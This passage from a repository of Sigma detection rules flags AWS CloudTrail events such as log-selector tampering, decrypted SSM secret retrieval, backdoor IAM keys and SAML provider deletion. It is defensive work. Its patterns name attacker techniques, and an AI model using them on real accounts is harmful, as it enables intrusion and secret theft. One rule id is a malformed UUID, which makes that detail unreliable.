5 | references: 6 | - https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-event-selectors/ 7 | - https://docs.aws.amazon.com/awscloudtrail/latest/APIReference/API_PutEventSelectors.html 8 | author: adanalvarez 9 | date: 2025-04-12 10 | modified: 2025-04-12 11 | tags: 12 | - attack.defense_evasion 13 | - attack.t1562.002 14 | logsource: 15 | product: aws 16 | service: cloudtrail 17 | detection: 18 | selection: 19 | eventSource: cloudtrail.amazonaws.com 20 | eventName: PutEventSelectors 21 | condition: selection 22 | falsepositives: 23 | - Legitimate administrative actions modifying event selectors 24 | level: high 25 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_securityhub_finding_evasion.yml: -------------------------------------------------------------------------------- 1 | title: AWS SecurityHub Findings Evasion 2 | id: a607e1fe-74bf-4440-a3ec-b059b9103157 3 | status: stable 4 | description: Detects the modification of the findings on SecurityHub. 5 | references: 6 | - https://docs.aws.amazon.com/cli/latest/reference/securityhub/ 7 | author: Sittikorn S 8 | date: 2021-06-28 9 | tags: 10 | - attack.defense-evasion 11 | - attack.t1562 12 | logsource: 13 | product: aws 14 | service: cloudtrail 15 | detection: 16 | selection: 17 | eventSource: securityhub.amazonaws.com 18 | eventName: 19 | - 'BatchUpdateFindings' 20 | - 'DeleteInsight' 21 | - 'UpdateFindings' 22 | - 'UpdateInsight' 23 | condition: selection 24 | fields: 25 | - sourceIPAddress 26 | - userIdentity.arn 27 | falsepositives: 28 | - System or Network administrator behaviors 29 | - DEV, UAT, SAT environment. You should apply this rule with PROD environment only. 
30 | level: high 31 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_route53resolver_deleteresolver.yml: -------------------------------------------------------------------------------- 1 | title: AWS Route 53 Resolver Query Log Configuration Deletion 2 | id: 5f6e7d8c-9b0a-1c2d-3e4f-5a6b7c8d9e0f 3 | status: test 4 | description: Detects deletion of Route 53 Resolver query logging configurations, which can disrupt DNS logging and hinder security monitoring. 5 | references: 6 | - https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.dns-delete-logs/ 7 | - https://docs.aws.amazon.com/Route53/latest/APIReference/API_DeleteResolverQueryLogConfig.html 8 | author: adanalvarez 9 | date: 2025-04-12 10 | modified: 2025-04-12 11 | tags: 12 | - attack.defense_evasion 13 | - attack.t1562.002 14 | logsource: 15 | product: aws 16 | service: route53resolver 17 | detection: 18 | selection: 19 | eventSource: route53resolver.amazonaws.com 20 | eventName: DeleteResolverQueryLogConfig 21 | condition: selection 22 | falsepositives: 23 | - Legitimate administrative actions removing obsolete DNS query logging configurations 24 | level: high 25 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_ec2_disable_encryption.yml: -------------------------------------------------------------------------------- 1 | title: AWS EC2 Disable EBS Encryption 2 | id: 16124c2d-e40b-4fcc-8f2c-5ab7870a2223 3 | status: stable 4 | description: | 5 | Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. 6 | Disabling default encryption does not change the encryption status of your existing volumes. 
7 | references: 8 | - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html 9 | author: Sittikorn S 10 | date: 2021-06-29 11 | modified: 2021-08-20 12 | tags: 13 | - attack.impact 14 | - attack.t1486 15 | - attack.t1565 16 | logsource: 17 | product: aws 18 | service: cloudtrail 19 | detection: 20 | selection: 21 | eventSource: ec2.amazonaws.com 22 | eventName: DisableEbsEncryptionByDefault 23 | condition: selection 24 | falsepositives: 25 | - System Administrator Activities 26 | - DEV, UAT, SAT environment. You should apply this rule with PROD account only. 27 | level: medium 28 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_ec2_startup_script_change.yml: -------------------------------------------------------------------------------- 1 | title: AWS EC2 Startup Shell Script Change 2 | id: 1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df 3 | status: test 4 | description: Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up. 
5 | references: 6 | - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9 7 | author: faloker 8 | date: 2020-02-12 9 | modified: 2022-06-07 10 | tags: 11 | - attack.execution 12 | - attack.t1059.001 13 | - attack.t1059.003 14 | - attack.t1059.004 15 | logsource: 16 | product: aws 17 | service: cloudtrail 18 | detection: 19 | selection_source: 20 | eventSource: ec2.amazonaws.com 21 | requestParameters.attribute: 'userData' 22 | eventName: ModifyInstanceAttribute 23 | condition: selection_source 24 | falsepositives: 25 | - Valid changes to the startup script 26 | level: high 27 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_iam_s3browser_loginprofile_creation.yml: -------------------------------------------------------------------------------- 1 | title: AWS IAM S3Browser LoginProfile Creation 2 | id: db014773-b1d3-46bd-ba26-133337c0ffee 3 | status: test 4 | description: Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile. 
5 | references: 6 | - https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor 7 | author: daniel.bohannon@permiso.io (@danielhbohannon) 8 | date: 2023-05-17 9 | tags: 10 | - attack.execution 11 | - attack.persistence 12 | - attack.t1059.009 13 | - attack.t1078.004 14 | logsource: 15 | product: aws 16 | service: cloudtrail 17 | detection: 18 | selection: 19 | eventSource: 'iam.amazonaws.com' 20 | eventName: 21 | - 'GetLoginProfile' 22 | - 'CreateLoginProfile' 23 | userAgent|contains: 'S3 Browser' 24 | condition: selection 25 | falsepositives: 26 | - Valid usage of S3 Browser for IAM LoginProfile listing and/or creation 27 | level: high 28 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_ssm_malicious_usage.yml: -------------------------------------------------------------------------------- 1 | title: Potential Malicious Usage of CloudTrail System Manager 2 | id: 38e7f511-3f74-41d4-836e-f57dfa18eead 3 | status: experimental 4 | description: | 5 | Detect when System Manager successfully executes commands against an instance. 
6 | references: 7 | - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/initial_access_via_system_manager.toml 8 | author: jamesc-grafana 9 | date: 2024-07-11 10 | tags: 11 | - attack.privilege-escalation 12 | - attack.t1566 13 | - attack.t1566.002 14 | logsource: 15 | product: aws 16 | service: cloudtrail 17 | detection: 18 | selection: 19 | eventName: 'SendCommand' 20 | eventSource: 'ssm.amazonaws.com' 21 | responseElements.command.status: 'Success' 22 | condition: selection 23 | falsepositives: 24 | - There are legitimate uses of SSM to send commands to EC2 instances 25 | - Legitimate users may have to use SSM to perform actions against machines in the Cloud to update or maintain them 26 | level: high 27 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_update_login_profile.yml: -------------------------------------------------------------------------------- 1 | title: AWS User Login Profile Was Modified 2 | id: 055fb148-60f8-462d-ad16-26926ce050f1 3 | status: test 4 | description: | 5 | Detects activity when someone is changing passwords on behalf of other users. 6 | An attacker with the "iam:UpdateLoginProfile" permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup. 
7 | references: 8 | - https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation 9 | author: toffeebr33k 10 | date: 2021-08-09 11 | modified: 2024-04-26 12 | tags: 13 | - attack.persistence 14 | - attack.t1098 15 | logsource: 16 | product: aws 17 | service: cloudtrail 18 | detection: 19 | selection: 20 | eventSource: 'iam.amazonaws.com' 21 | eventName: 'UpdateLoginProfile' 22 | filter_main_user_identity: 23 | userIdentity.arn|fieldref: requestParameters.userName 24 | condition: selection and not 1 of filter_main_* 25 | falsepositives: 26 | - Legitimate user account administration 27 | level: high 28 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_eks_cluster_created_or_deleted.yml: -------------------------------------------------------------------------------- 1 | title: AWS EKS Cluster Created or Deleted 2 | id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 3 | status: test 4 | description: Identifies when an EKS cluster is created or deleted. 5 | references: 6 | - https://any-api.com/amazonaws_com/eks/docs/API_Description 7 | author: Austin Songer 8 | date: 2021-08-16 9 | modified: 2022-10-09 10 | tags: 11 | - attack.impact 12 | - attack.t1485 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection: 18 | eventSource: eks.amazonaws.com 19 | eventName: 20 | - CreateCluster 21 | - DeleteCluster 22 | condition: selection 23 | falsepositives: 24 | - EKS Cluster being created or deleted may be performed by a system administrator. 25 | - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. 26 | - EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 
27 | level: low 28 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_ssm_ssmgetparameter.yml: -------------------------------------------------------------------------------- 1 | title: AWS SSM GetParameter(s) with Decryption 2 | id: 3c4d5e6f-7a8b-9c0d-1e2f-3a4b5c6d7e8f 3 | status: test 4 | description: Detects usage of the GetParameter and GetParameters API calls with the withDecryption flag set to true, which retrieves decrypted SecureString parameters from AWS Systems Manager Parameter Store. 5 | references: 6 | - https://stratus-red-team.cloud/attack-techniques/AWS/aws.credential-access.ssm-retrieve-securestring-parameters/ 7 | - https://docs.aws.amazon.com/systems-manager/latest/APIReference/API_GetParameter.html 8 | - https://docs.aws.amazon.com/systems-manager/latest/APIReference/API_GetParameters.html 9 | author: adanalvarez 10 | date: 2025-04-12 11 | modified: 2025-04-12 12 | tags: 13 | - attack.credential_access 14 | - attack.t1552 15 | logsource: 16 | product: aws 17 | service: ssm 18 | detection: 19 | selection: 20 | eventSource: ssm.amazonaws.com 21 | eventName: 22 | - GetParameter 23 | - GetParameters 24 | condition: selection 25 | falsepositives: 26 | - Legitimate administrative actions retrieving SecureString parameters with decryption 27 | level: medium 28 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_s3_lifecycle.yml: -------------------------------------------------------------------------------- 1 | title: AWS S3 Lifecycle Rule with Short Expiration on CloudTrail Bucket 2 | id: 4d5e6f7a-8b9c-0d1e-2f3a-4b5c6d7e8f9g 3 | status: test 4 | description: Detects the application of an S3 Lifecycle Rule with a short expiration period on the S3 bucket used by AWS CloudTrail, which could lead to premature deletion of log files. 
5 | references: 6 | - https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/ 7 | - https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html 8 | author: adanalvarez 9 | date: 2025-04-12 10 | modified: 2025-04-12 11 | tags: 12 | - attack.defense_evasion 13 | - attack.t1562.001 14 | logsource: 15 | product: aws 16 | service: s3 17 | category: management 18 | detection: 19 | selection: 20 | eventSource: s3.amazonaws.com 21 | eventName: PutBucketLifecycleConfiguration 22 | requestParameters.lifecycleConfiguration.rules: 23 | - expiration: 24 | days: 1 25 | condition: selection 26 | falsepositives: 27 | - Legitimate administrative actions setting short expiration periods for specific operational needs 28 | level: high 29 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_enum_buckets.yml: -------------------------------------------------------------------------------- 1 | title: Potential Bucket Enumeration on AWS 2 | id: f305fd62-beca-47da-ad95-7690a0620084 3 | related: 4 | - id: 4723218f-2048-41f6-bcb0-417f2d784f61 5 | type: similar 6 | status: test 7 | description: Looks for potential enumeration of AWS buckets via ListBuckets. 
8 | references: 9 | - https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md 10 | - https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html 11 | - https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/ 12 | author: Christopher Peacock @securepeacock, SCYTHE @scythe_io (modified by adanalvarez) 13 | date: 2023-01-06 14 | modified: 2024-07-10 15 | tags: 16 | - attack.discovery 17 | - attack.t1580 18 | logsource: 19 | product: aws 20 | service: cloudtrail 21 | detection: 22 | selection: 23 | eventSource: 's3.amazonaws.com' 24 | eventName: 'ListBuckets' 25 | condition: selection 26 | falsepositives: 27 | - Administrators listing buckets, it may be necessary to filter out users who commonly conduct this activity. 28 | level: low 29 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_passed_role_to_glue_development_endpoint.yml: -------------------------------------------------------------------------------- 1 | title: AWS Glue Development Endpoint Activity 2 | id: 4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26 3 | status: test 4 | description: Detects possible suspicious glue development endpoint activity. 5 | references: 6 | - https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/ 7 | - https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html 8 | author: Austin Songer @austinsonger 9 | date: 2021-10-03 10 | modified: 2022-12-18 11 | tags: 12 | - attack.privilege-escalation 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection: 18 | eventSource: 'glue.amazonaws.com' 19 | eventName: 20 | - 'CreateDevEndpoint' 21 | - 'DeleteDevEndpoint' 22 | - 'UpdateDevEndpoint' 23 | condition: selection 24 | falsepositives: 25 | - Glue Development Endpoint Activity may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. 26 | - If known behavior is causing false positives, it can be exempted from the rule. 27 | level: low 28 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_elasticache_security_group_created.yml: -------------------------------------------------------------------------------- 1 | title: AWS ElastiCache Security Group Created 2 | id: 4ae68615-866f-4304-b24b-ba048dfa5ca7 3 | status: test 4 | description: Detects when an ElastiCache security group has been created. 5 | references: 6 | - https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml 7 | author: Austin Songer @austinsonger 8 | date: 2021-07-24 9 | modified: 2022-10-09 10 | tags: 11 | - attack.persistence 12 | - attack.t1136 13 | - attack.t1136.003 14 | logsource: 15 | product: aws 16 | service: cloudtrail 17 | detection: 18 | selection: 19 | eventSource: elasticache.amazonaws.com 20 | eventName: 'CreateCacheSecurityGroup' 21 | condition: selection 22 | falsepositives: 23 | - A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 
24 | 25 | 26 | level: low 27 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_ec2_import_key_pair_activity.yml: -------------------------------------------------------------------------------- 1 | title: AWS Key Pair Import Activity 2 | id: 92f84194-8d9a-4ee0-8699-c30bfac59780 3 | status: experimental 4 | description: | 5 | Detects the import of SSH key pairs into AWS EC2, which may indicate an attacker attempting to gain unauthorized access to instances. This activity could lead to initial access, persistence, or privilege escalation, potentially compromising sensitive data and operations. 6 | references: 7 | - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ImportKeyPair.html 8 | author: Ivan Saakov 9 | date: 2024-12-19 10 | tags: 11 | - attack.initial-access 12 | - attack.t1078 13 | - attack.persistence 14 | - attack.privilege-escalation 15 | logsource: 16 | product: aws 17 | service: cloudtrail 18 | detection: 19 | selection: 20 | eventSource: 'ec2.amazonaws.com' 21 | eventName: 'ImportKeyPair' 22 | condition: selection 23 | falsepositives: 24 | - Legitimate administrative actions by authorized users importing keys for valid purposes. 25 | - Automated processes for infrastructure setup may trigger this alert. 26 | - Verify the user identity, user agent, and source IP address to ensure they are expected. 27 | level: medium 28 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_security_group_change_rds.yml: -------------------------------------------------------------------------------- 1 | title: RDS Database Security Group Modification 2 | id: 14f3f1c8-02d5-43a2-a191-91ffb52d3015 3 | status: test 4 | description: | 5 | Detects changes to the security group entries for RDS databases. 
This can indicate that a misconfiguration has occurred which potentially exposes the database to the public internet or to a wider audience within the VPC, or that valid rules have been removed, which could impact the availability of the database to legitimate services and users.
5 | references: 6 | - https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_ModifyDBCluster.html 7 | - https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteDBCluster.html 8 | - https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc#rds-modifydbinstance 9 | author: Ivan Saakov 10 | date: 2024-12-06 11 | tags: 12 | - attack.exfiltration 13 | - attack.t1020 14 | logsource: 15 | product: aws 16 | service: cloudtrail 17 | detection: 18 | selection: 19 | eventSource: rds.amazonaws.com 20 | eventName: 21 | - ModifyDBCluster 22 | - DeleteDBCluster 23 | condition: selection 24 | falsepositives: 25 | - Verify if the modification or deletion was performed by an authorized administrator. 26 | - Confirm if the modification or deletion was part of a planned change or maintenance activity. 27 | level: high 28 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_security_group_change_loadbalancer.yml: -------------------------------------------------------------------------------- 1 | title: LoadBalancer Security Group Modification 2 | id: 7a4409fc-f8ca-45f6-8006-127d779eaad9 3 | status: test 4 | description: | 5 | Detects changes to the security groups associated with an Elastic Load Balancer (ELB) or Application Load Balancer (ALB). 6 | This can indicate that a misconfiguration allowing more traffic into the system than required, or could indicate that an attacker is attempting to enable new connections into a VPC or subnet controlled by the account. 
7 | references: 8 | - https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/ 9 | author: jamesc-grafana 10 | date: 2024-07-11 11 | tags: 12 | - attack.initial-access 13 | - attack.t1190 14 | logsource: 15 | product: aws 16 | service: cloudtrail 17 | detection: 18 | selection: 19 | eventSource: 'elasticloadbalancing.amazonaws.com' 20 | eventName: 21 | - 'ApplySecurityGroupsToLoadBalancer' 22 | - 'SetSecurityGroups' 23 | condition: selection 24 | falsepositives: 25 | - Repurposing of an ELB or ALB to serve a different or additional application 26 | - Changes to security groups to allow for new services to be deployed 27 | level: medium 28 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_route_53_domain_transferred_to_another_account.yml: -------------------------------------------------------------------------------- 1 | title: AWS Route 53 Domain Transferred to Another Account 2 | id: b056de1a-6e6e-4e40-a67e-97c9808cf41b 3 | status: test 4 | description: Detects when a request has been made to transfer a Route 53 domain to another AWS account. 5 | references: 6 | - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml 7 | author: Elastic, Austin Songer @austinsonger 8 | date: 2021-07-22 9 | modified: 2022-10-09 10 | tags: 11 | - attack.persistence 12 | - attack.credential-access 13 | - attack.t1098 14 | logsource: 15 | product: aws 16 | service: cloudtrail 17 | detection: 18 | selection: 19 | eventSource: route53.amazonaws.com 20 | eventName: TransferDomainToAnotherAwsAccount 21 | condition: selection 22 | falsepositives: 23 | - A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. 
Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 24 | level: low 25 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_sts_getsessiontoken_misuse.yml: -------------------------------------------------------------------------------- 1 | title: AWS STS GetSessionToken Misuse 2 | id: b45ab1d2-712f-4f01-a751-df3826969807 3 | status: test 4 | description: Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges. 5 | references: 6 | - https://github.com/elastic/detection-rules/pull/1213 7 | - https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html 8 | author: Austin Songer @austinsonger 9 | date: 2021-07-24 10 | modified: 2022-10-09 11 | tags: 12 | - attack.lateral-movement 13 | - attack.privilege-escalation 14 | - attack.t1548 15 | - attack.t1550 16 | - attack.t1550.001 17 | logsource: 18 | product: aws 19 | service: cloudtrail 20 | detection: 21 | selection: 22 | eventSource: sts.amazonaws.com 23 | eventName: GetSessionToken 24 | userIdentity.type: IAMUser 25 | condition: selection 26 | falsepositives: 27 | - GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 
28 | level: low 29 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_iam_backdoor_users_keys.yml: -------------------------------------------------------------------------------- 1 | title: AWS IAM Backdoor Users Keys 2 | id: 0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2 3 | status: test 4 | description: | 5 | Detects AWS API key creation for a user by another user. 6 | Backdoored users can be used to obtain persistence in the AWS environment. 7 | Also with this alert, you can detect a flow of AWS keys in your org. 8 | references: 9 | - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py 10 | author: faloker 11 | date: 2020-02-12 12 | modified: 2022-10-09 13 | tags: 14 | - attack.persistence 15 | - attack.t1098 16 | logsource: 17 | product: aws 18 | service: cloudtrail 19 | detection: 20 | selection_source: 21 | eventSource: iam.amazonaws.com 22 | eventName: CreateAccessKey 23 | filter: 24 | userIdentity.arn|contains: responseElements.accessKey.userName 25 | condition: selection_source and not filter 26 | fields: 27 | - userIdentity.arn 28 | - responseElements.accessKey.userName 29 | - errorCode 30 | - errorMessage 31 | falsepositives: 32 | - Adding user keys to their own accounts (the filter cannot cover all possible variants of user naming) 33 | - AWS API keys legitimate exchange workflows 34 | level: medium 35 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Local .terraform directories 2 | **/.terraform/* 3 | 4 | # .tfstate files 5 | *.tfstate 6 | *.tfstate.* 7 | 8 | # Crash log files 9 | crash.log 10 | crash.*.log 11 | 12 | # Exclude all .tfvars files, which are likely to contain sensitive data, such as 13 | # password, private keys, and other secrets. 
These should not be part of version 14 | # control as they are data points which are potentially sensitive and subject 15 | # to change depending on the environment. 16 | *.tfvars 17 | 18 | # Ignore override files as they are usually used to override resources locally and so 19 | # are not checked in 20 | override.tf 21 | override.tf.json 22 | *_override.tf 23 | *_override.tf.json 24 | 25 | # Ignore transient lock info files created by terraform apply 26 | .terraform.tfstate.lock.info 27 | 28 | # Include override files you do wish to add to version control using negated pattern 29 | # !example_override.tf 30 | 31 | # Include tfplan files to ignore the plan output of command: terraform plan -out=tfplan 32 | # example: *tfplan* 33 | 34 | # Ignore CLI configuration files 35 | .terraformrc 36 | terraform.rc 37 | 38 | # Pytest 39 | __pycache__/ 40 | *.py[cod] 41 | *$py.class 42 | .pytest_cache/ 43 | .coverage 44 | htmlcov/ 45 | .tox/ 46 | .nox/ 47 | .hypothesis/ 48 | .egg-info/ 49 | 50 | # Lambda layer 51 | lambdas/layer/python/ 52 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_new_lambda_layer_attached.yml: -------------------------------------------------------------------------------- 1 | title: AWS New Lambda Layer Attached 2 | id: 97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d 3 | status: test 4 | description: | 5 | Detects when a user attached a Lambda layer to an existing Lambda function. 6 | A malicious Lambda layer could execute arbitrary code in the context of the function's IAM role. 7 | This would give an adversary access to resources that the function has access to. 
8 | references: 9 | - https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html 10 | - https://github.com/clearvector/lambda-spy 11 | author: Austin Songer 12 | date: 2021-09-23 13 | modified: 2025-03-17 14 | tags: 15 | - attack.privilege-escalation 16 | logsource: 17 | product: aws 18 | service: cloudtrail 19 | detection: 20 | selection: 21 | eventSource: lambda.amazonaws.com 22 | eventName|startswith: 'UpdateFunctionConfiguration' 23 | requestParameters.layers|contains: '*' 24 | condition: selection 25 | falsepositives: 26 | - Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. 27 | - Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 28 | level: low 29 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_sso_idp_change.yml: -------------------------------------------------------------------------------- 1 | title: AWS Identity Center Identity Provider Change 2 | id: d3adb3ef-b7e7-4003-9092-1924c797db35 3 | status: test 4 | description: | 5 | Detects a change in the AWS Identity Center (FKA AWS SSO) identity provider. 6 | A change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation. 
7 | references: 8 | - https://docs.aws.amazon.com/singlesignon/latest/userguide/app-enablement.html 9 | - https://docs.aws.amazon.com/singlesignon/latest/userguide/sso-info-in-cloudtrail.html 10 | - https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsiamidentitycentersuccessortoawssinglesign-on.html 11 | author: Michael McIntyre @wtfender 12 | date: 2023-09-27 13 | tags: 14 | - attack.persistence 15 | - attack.t1556 16 | logsource: 17 | product: aws 18 | service: cloudtrail 19 | detection: 20 | selection: 21 | eventSource: 22 | - 'sso-directory.amazonaws.com' 23 | - 'sso.amazonaws.com' 24 | eventName: 25 | - 'AssociateDirectory' 26 | - 'DisableExternalIdPConfigurationForDirectory' 27 | - 'DisassociateDirectory' 28 | - 'EnableExternalIdPConfigurationForDirectory' 29 | condition: selection 30 | falsepositives: 31 | - Authorized changes to the AWS account's identity provider 32 | level: high 33 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_security_group_change_ingress_egress.yml: -------------------------------------------------------------------------------- 1 | title: Ingress/Egress Security Group Modification 2 | id: 6fb77778-040f-4015-9440-572aa9b6b580 3 | status: test 4 | description: | 5 | Detects when an account makes changes to the ingress or egress rules of a security group. 6 | This can indicate that an attacker is attempting to open up new attack vectors in the account, that they are trying to exfiltrate data over the network, or that they are trying to allow machines in that VPC/Subnet to contact a C&C server. 
7 | references: 8 | - https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/ 9 | author: jamesc-grafana 10 | date: 2024-07-11 11 | tags: 12 | - attack.initial-access 13 | - attack.t1190 14 | logsource: 15 | product: aws 16 | service: cloudtrail 17 | detection: 18 | selection: 19 | eventSource: 'ec2.amazonaws.com' 20 | eventName: 21 | - 'AuthorizeSecurityGroupEgress' 22 | - 'AuthorizeSecurityGroupIngress' 23 | - 'RevokeSecurityGroupEgress' 24 | - 'RevokeSecurityGroupIngress' 25 | condition: selection 26 | falsepositives: 27 | - New VPCs and Subnets being setup requiring a different security profile to those already defined 28 | - A single port being opened for a new service that is known to be deploying 29 | - Administrators closing unused ports to reduce the attack surface 30 | level: medium 31 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_delete_saml_provider.yml: -------------------------------------------------------------------------------- 1 | title: AWS SAML Provider Deletion Activity 2 | id: ccd6a6c8-bb4e-4a91-9d2a-07e632819374 3 | status: experimental 4 | description: | 5 | Detects the deletion of an AWS SAML provider, potentially indicating malicious intent to disrupt administrative or security team access. 6 | An attacker can remove the SAML provider for the information security team or a team of system administrators, to make it difficult for them to work and investigate at the time of the attack and after it. 
7 | references: 8 | - https://docs.aws.amazon.com/IAM/latest/APIReference/API_DeleteSAMLProvider.html 9 | author: Ivan Saakov 10 | date: 2024-12-19 11 | modified: 2025-04-12 # By adanalvarez 12 | tags: 13 | - attack.t1078.004 14 | - attack.privilege-escalation 15 | - attack.t1531 16 | logsource: 17 | product: aws 18 | service: cloudtrail 19 | detection: 20 | selection: 21 | eventSource: 'iam.amazonaws.com' 22 | eventName: 'DeleteSAMLProvider' 23 | condition: selection 24 | falsepositives: 25 | - Automated processes using tools like Terraform may trigger this alert. 26 | - Legitimate administrative actions by authorized system administrators could cause this alert. Verify the user identity, user agent, and hostname to ensure they are expected. 27 | - Deletions by unfamiliar users should be investigated. If the behavior is known and expected, it can be exempted from the rule. 28 | level: medium 29 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_elasticache_security_group_modified_or_deleted.yml: -------------------------------------------------------------------------------- 1 | title: AWS ElastiCache Security Group Modified or Deleted 2 | id: 7c797da2-9cf2-4523-ba64-33b06339f0cc 3 | status: test 4 | description: Identifies when an ElastiCache security group has been modified or deleted. 
5 | references: 6 | - https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml 7 | author: Austin Songer @austinsonger 8 | date: 2021-07-24 9 | modified: 2022-10-09 10 | tags: 11 | - attack.impact 12 | - attack.t1531 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection: 18 | eventSource: elasticache.amazonaws.com 19 | eventName: 20 | - 'DeleteCacheSecurityGroup' 21 | - 'AuthorizeCacheSecurityGroupIngress' 22 | - 'RevokeCacheSecurityGroupIngress' 23 | - 'AuthorizeCacheSecurityGroupEgress' 24 | - 'RevokeCacheSecurityGroupEgress' 25 | condition: selection 26 | falsepositives: 27 | - An ElastiCache security group modification or deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group changes from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 28 | 29 | 30 | level: low 31 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_susp_saml_activity.yml: -------------------------------------------------------------------------------- 1 | title: AWS Suspicious SAML Activity 2 | id: f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e 3 | status: test 4 | description: Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML. 
